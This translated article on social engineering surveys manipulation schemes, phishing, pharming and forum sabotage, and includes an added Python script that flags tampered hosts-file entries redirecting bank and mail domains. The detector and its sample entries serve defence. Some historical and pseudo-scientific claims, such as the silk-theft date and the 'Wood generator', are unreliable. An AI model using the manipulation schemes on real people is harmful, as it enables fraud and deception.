Based on all of the above, we can conclude: the main way to protect against social engineering is to train employees. It is necessary to know and remember that ignorance is not an excuse. Each user of the system should be aware of the dangers of disclosing confidential information and know ways to help prevent leakage. Forewarned is forearmed!

Methods of social engineering are the subject of the rest of this article, together with everything related to the manipulation of people, phishing, theft of client databases and more. The material was kindly provided by its author, Andrey Serikov, to whom we are very grateful.

A. SERIKOV

A. B. BOROVSKY

INFORMATION TECHNOLOGIES OF SOCIAL HACKING

Introduction

Mankind's desire to achieve perfect fulfillment of assigned tasks drove the development of modern computer technology, and attempts to satisfy people's conflicting demands led to the development of software products. These software products not only support the operation of hardware but also manage it.

The development of knowledge about man and computer has led to the emergence of a fundamentally new type of system, the "human-machine" system, in which a person can be regarded as hardware running a stable, functional, multitasking operating system called the "psyche".

The subject of this work is social hacking as a branch of social programming, in which a person is manipulated through human weaknesses, prejudices and stereotypes by means of social engineering.

Social engineering and its methods

Methods of human manipulation have been known for a long time; they mainly came to social engineering from the arsenal of various intelligence services.

The first known case of competitive intelligence dates back to the 6th century BC and occurred in China, when the Chinese lost the secret of making silk, which was fraudulently stolen by Roman spies.

Social engineering is a science that is defined as a set of methods for manipulating human behavior, based on the use of the weaknesses of the human factor, without the use of technical means.

According to many experts, the greatest threat to information security is posed by social engineering methods, if only because social hacking requires neither significant financial investment nor thorough knowledge of computer technology, and also because people have certain behavioral tendencies that can be exploited for careful manipulation.

And no matter how much we improve technical protection systems, people will remain people, with the weaknesses, prejudices and stereotypes through which they are manipulated. Setting up a human "security program" is the most difficult task and does not always give guaranteed results, since this filter must be constantly adjusted. Here the main motto of all security experts sounds more relevant than ever: "Security is a process, not a result."

Areas of application of social engineering:

  1. general destabilization of the organization’s work in order to reduce its influence and the possibility of subsequent complete destruction of the organization;
  2. financial fraud in organizations;
  3. phishing and other methods of stealing passwords in order to access personal banking data of individuals;
  4. theft of client databases;
  5. competitive intelligence;
  6. general information about the organization, its strengths and weaknesses, with the aim of subsequently destroying this organization in one way or another (often used for raider attacks);
  7. information about the most promising employees with the aim of subsequently "enticing" them to your organization.

Social programming and social hacking

Social programming can be called an applied discipline that deals with targeted influence on a person or group of people in order to change or maintain their behavior in the desired direction. Thus, the social programmer sets himself a goal: mastering the art of managing people. The basic concept of social programming is that many people’s actions and their reactions to one or another external influence are in many cases predictable.

Social programming methods are attractive because either no one will ever learn of them or, even if someone suspects something, it is very difficult to bring such a figure to justice; in some cases it is possible to "program" the behavior both of one person and of a large group. These opportunities fall into the category of social hacking precisely because in all of them people carry out someone else's will, as if obeying a "program" written by a social hacker.

Social hacking, as the possibility of hacking a person and programming him to perform the required actions, comes from social programming, an applied discipline of social engineering in which specialists in the field, social hackers, use techniques of psychological influence and acting borrowed from the arsenal of the intelligence services.

Social hacking is used in most cases when it comes to attacking a person who is part of a computer system. A computer system that is being hacked does not exist by itself: it contains an important component, a person. To get information, a social hacker needs to hack the person who works with the computer. In most cases this is easier than hacking into the victim's computer in an attempt to find out the password.

Typical influence algorithm in social hacking:

All attacks by social hackers fit into one fairly simple scheme:

  1. the purpose of influencing a particular object is formulated;
  2. information about the object is collected in order to find the most convenient targets of influence;
  3. based on the collected information, a stage that psychologists call attraction is carried out. Attraction (from the Latin attrahere, to attract) is the creation of the necessary conditions for influencing the object;
  4. the object is coerced into taking the action the social hacker needs.

Coercion is achieved by performing the previous stages, i.e., after the attraction is achieved, the victim himself takes the actions necessary for the social engineer.

Based on the information collected, social hackers quite accurately predict the psycho- and sociotype of the victim, identifying not only needs for food, sex, etc., but also the need for love, the need for money, the need for comfort, etc., etc.

And indeed, why try to penetrate this or that company, hack computers or ATMs, or organize complex combinations, when everything can be done more simply: make a person fall in love with you, and he will, of his own free will, transfer money to the specified account or share the necessary information every time?

Based on the fact that people's actions are predictable and subject to certain laws, social hackers and social programmers use both original multi-step techniques and simple positive and negative techniques based on the psychology of human consciousness, behavioral programs, oscillations of internal organs, logical thinking, imagination, memory and attention. These techniques include:

  • Wood generator - generates oscillations at the same frequency as the oscillations of internal organs, producing a resonance effect as a result of which people begin to feel severe discomfort and panic;
  • influence on the geography of the crowd - for the peaceful dispersal of extremely dangerous, aggressive, large groups of people;
  • high-frequency and low-frequency sounds - to provoke panic or its reverse effect, as well as other manipulations;
  • social imitation program - a person judges the correctness of actions by finding out what actions other people consider correct;
  • claque program - (based on social imitation) organizing the required reaction from an audience;
  • queue formation - (based on social imitation) a simple but effective advertising move;
  • mutual assistance program - a person seeks to repay kindness to those who have done him a kindness. The desire to fulfill this program often exceeds all reason.

Social hacking on the Internet

With the advent and development of the Internet, a virtual environment consisting of people and their interactions, the environment for manipulating a person in order to obtain the necessary information and make him perform the necessary actions has expanded. Nowadays the Internet is a means of worldwide broadcasting and a medium for collaboration and communication that covers the entire globe. This is exactly what social engineers use to achieve their goals.

Ways to manipulate a person via the Internet:

In the modern world, the owners of almost every company have realized that the Internet is a very effective and convenient means of expanding a business whose main task is to increase the company's profits. It is known that advertising is used to attract attention to the desired object, to generate or maintain interest in it and to promote it on the market. But because the advertising market was divided up long ago, most types of advertising are wasted money for most entrepreneurs. Internet advertising is not just one more type of media advertising; it is something more, since through Internet advertising people interested in cooperation come to the organization's website.

Internet advertising, unlike advertising in the media, offers many more opportunities and parameters for managing an advertising campaign. Its most important feature is that fees are charged only when an interested user follows an advertising link, which of course makes advertising on the Internet more effective and less costly than advertising in the media. Advertising on television or in print is paid for in full up front, and the advertiser simply waits for potential clients; whether clients respond depends on the quality of the advertisement's production and presentation, but the budget has already been spent, and if the advertising did not work, it is wasted. Unlike such media advertising, Internet advertising makes it possible to track audience response and manage the campaign before its budget is spent; moreover, it can be suspended when demand for products has risen and resumed when demand begins to fall.

Another method of influence is the so-called "killing of forums", where social programming is used to create anti-advertising for a particular project. In this case the social programmer, using nothing but openly provocative actions, destroys the forum: with several pseudonyms (nicknames) he builds an anti-leader group around himself and draws in the project's regular visitors who are dissatisfied with the behavior of the administration. After such events it becomes impossible to promote products or ideas on the forum, which is what the forum was originally created for.

Methods of influencing a person via the Internet for the purpose of social engineering:

Phishing is a type of Internet fraud aimed at gaining access to confidential user data, namely logins and passwords. This is achieved through mass emailings on behalf of popular brands, as well as personal messages inside various services (Rambler), banks or social networks (Facebook). The letter often contains a link to a website that is outwardly indistinguishable from the real one. After the user lands on the fake page, social engineers use various techniques to encourage him to enter the login and password he uses for a specific site, which gives the attacker access to the user's accounts, including bank accounts.

A more dangerous type of fraud than phishing is the so-called pharming.

Pharming is a mechanism for covertly redirecting users to phishing sites. A social engineer distributes special malware to users' computers which, once launched, redirects requests for the sites the user needs to fake ones. The attack is therefore highly covert, and user participation is minimized: it is enough to wait until the user decides to visit a site of interest to the social engineer.
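An added defensive check, written for this article rather than taken from it: one common way pharming malware performs the redirection described above is to append entries to the local hosts file, so the Python script below parses a hosts file and flags watched domains that are pinned to a routable address instead of being resolved through DNS. The hosts content, the 203.0.113.45 address and the watched-domain list are constructed for the example.

```python
"""Detect hosts-file tampering of the kind used for pharming (added example)."""
import ipaddress

# Constructed sample hosts file: the last two lines imitate a pharming
# modification. 203.0.113.0/24 is a documentation range, not a real server.
SAMPLE_HOSTS = """\
# Standard entries
127.0.0.1       localhost
::1             localhost ip6-localhost
0.0.0.0         ads.example            # ad-blocking style entry, harmless
# Lines appended by malware (constructed)
203.0.113.45    online-bank.example www.online-bank.example
203.0.113.45    mail.example
"""

# Domains whose resolution the organisation cares about (assumed list).
WATCHED_DOMAINS = ["online-bank.example", "mail.example"]


def parse_hosts(text):
    """Return a list of (ip_address, [hostnames]) from hosts-file text.

    Comments and blank lines are ignored; malformed lines are skipped
    rather than raising, since the file is attacker-influenced input.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        entries.append((ip, fields[1:]))
    return entries


def is_watched(hostname, watched):
    """True if hostname equals a watched domain or is a subdomain of one."""
    host = hostname.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in watched)


def find_pharming_entries(text, watched=WATCHED_DOMAINS):
    """Return [(hostname, ip)] for watched names pinned to a routable address."""
    findings = []
    for ip, names in parse_hosts(text):
        # Loopback (127.0.0.1, ::1) and 0.0.0.0 entries block or localise a
        # name; they do not send the user to another server, so skip them.
        if ip.is_loopback or ip.is_unspecified:
            continue
        findings.extend((n, str(ip)) for n in names if is_watched(n, watched))
    return findings


if __name__ == "__main__":
    for host, ip in find_pharming_entries(SAMPLE_HOSTS):
        print(f"suspicious hosts entry: {host} -> {ip}")
```

On a real workstation, point the function at the contents of /etc/hosts or %SystemRoot%\System32\drivers\etc\hosts and extend WATCHED_DOMAINS with the domains your users actually log in to.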

Conclusion

Social engineering is a science that emerged from sociology and claims to be the body of knowledge that guides, puts in order and optimizes the process of creating, modernizing and reproducing new (“artificial”) social realities. In a certain way, it “completes” sociological science, completes it at the phase of transforming scientific knowledge into models, projects and designs of social institutions, values, norms, algorithms of activity, relationships, behavior, etc.

Despite the fact that Social Engineering is a relatively young science, it causes great damage to the processes that occur in society.

The simplest methods of protection from the effects of this destructive science are:

  • drawing people's attention to security issues;
  • users understanding the seriousness of the problem and accepting the system's security policy.
